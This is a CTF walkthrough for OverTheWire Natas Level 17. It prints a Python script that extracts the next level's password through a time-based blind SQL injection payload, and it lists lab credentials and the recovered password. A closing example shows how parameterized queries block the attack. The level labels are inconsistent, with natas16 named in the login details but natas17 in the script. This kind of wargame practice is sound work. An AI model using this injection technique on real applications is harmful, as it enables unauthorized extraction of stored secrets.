OverTheWire:- Updated Natas Walkthrough — Level 17

Samxia99
Apr 6, 2024

Hello everyone, I would like to share how I solved the Natas CTF. Here is the updated password as well; I hope this write-up will be helpful.

Hello folks!!! It’s samxia99.

My bio link: https://beacons.ai/samxia99

Greetings everyone! I’m excited to share with you how I was able to successfully conquer a CTF challenge. Through this write-up, I’ll provide a clear explanation of my techniques and strategies, and I’m confident that it will greatly benefit those who are interested in CTF challenges. So, sit back, relax, and let me take you on an informative journey.

Just a quick reminder that the game has been updated, so the password has also been changed. I hope this password is helpful!

Natas Level 16 → Level 17

  • Here are the login details.
Username: natas16
URL: http://natas16.natas.labs.overthewire.org
  • After logging in we can see this page.
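  • Let’s view the source code.
  • From the source code we can guess that this level is a time-based blind SQL injection, so let’s brute-force it like the other SQL levels. Each request asks whether the next level’s password starts with a guessed prefix and sleeps for 2 seconds when it does, so a slow response confirms the guess. Here is the script, saved as a .py file and run from the terminal with Python.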
import requests
from time import time

# Candidate characters for each position of the password
characters = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789"

# HTTP basic-auth credentials for the current level
username = "natas17"
password = "XkEuChE0SbnKBvH1RU7ksIb9uuLmI7sd"

Url = "http://natas17.natas.labs.overthewire.org"

session = requests.session()

current_password = list()

while True:
    for character in characters:
        guess = "".join(current_password) + character
        print("Trying with: " + guess)
        startTime = time()
        # SLEEP(2) only runs when natas18's password starts with the guess
        response = session.post(
            Url,
            data={"username": 'natas18" AND password LIKE BINARY "' + guess + '%" AND SLEEP(2) #'},
            auth=(username, password),
        )
        endTime = time()
        # A response slower than the sleep means the guessed prefix matched
        if endTime - startTime > 2:
            current_password.append(character)
            break
    # Passwords in this game are 32 characters long
    if len(current_password) == 32:
        break

print("Password: " + "".join(current_password))
  • This brute force will take some time and we will get the password at the end.
  • Boom!!! Here we get the password to the next level.
Pass:-8NEDUUxg8kFgPV84uLwvZkGn6okJQ6aq
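
Why the timing trick works and how it is closed, as an added example (not the level's source and not the author's code): a string-built lookup next to a parameterized one, run against an in-memory SQLite table. The table contents, the function names and the `sleep` stand-in (which records calls instead of delaying, since SQLite has no SLEEP()) are assumptions made for the illustration.

```python
import sqlite3

def make_db():
    """Build an in-memory users table with one constructed row."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (username TEXT, password TEXT)")
    db.execute("INSERT INTO users VALUES ('alice', 'S3cretValue')")
    calls = []

    def fake_sleep(seconds):
        # Stand-in for MySQL's SLEEP(): records the call instead of delaying.
        calls.append(seconds)
        return 1

    db.create_function("sleep", 1, fake_sleep)
    return db, calls

def lookup_vulnerable(db, username):
    # Request input is pasted into the SQL text, so a quote in it ends the
    # string literal and the rest is parsed as SQL.
    query = "SELECT username FROM users WHERE username = '" + username + "'"
    return db.execute(query).fetchall()

def lookup_safe(db, username):
    # Bound parameter: the input is only ever compared as a value.
    query = "SELECT username FROM users WHERE username = ?"
    return db.execute(query, (username,)).fetchall()

def probe(prefix):
    # Same shape as the script's payload, in SQLite quoting and comment syntax.
    return "alice' AND password LIKE '" + prefix + "%' AND sleep(2) --"

def run(lookup, prefix):
    """Return (rows, recorded sleep calls) for one probe against a fresh DB."""
    db, calls = make_db()
    rows = lookup(db, probe(prefix))
    return rows, calls

if __name__ == "__main__":
    for name, fn in (("vulnerable", lookup_vulnerable), ("safe", lookup_safe)):
        for prefix in ("S", "x"):
            rows, calls = run(fn, prefix)
            print(f"{name:10} prefix={prefix!r} rows={rows} sleep_calls={calls}")
```

With the bound parameter the probe string is just a username that matches no row, so the delay the script measures never occurs.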

Hopefully, this write-up will be useful for everybody. I have tried to make it easy to read.

Next level:-https://medium.com/@samarthkokil64/overthewire-updated-natas-walkthrough-level-18-bd9184479518

Previous level:-https://medium.com/@samarthkokil64/overthewire-updated-natas-walkthrough-level-16-d3cb5b3f6c2e

PS:- THANKS FOR READING
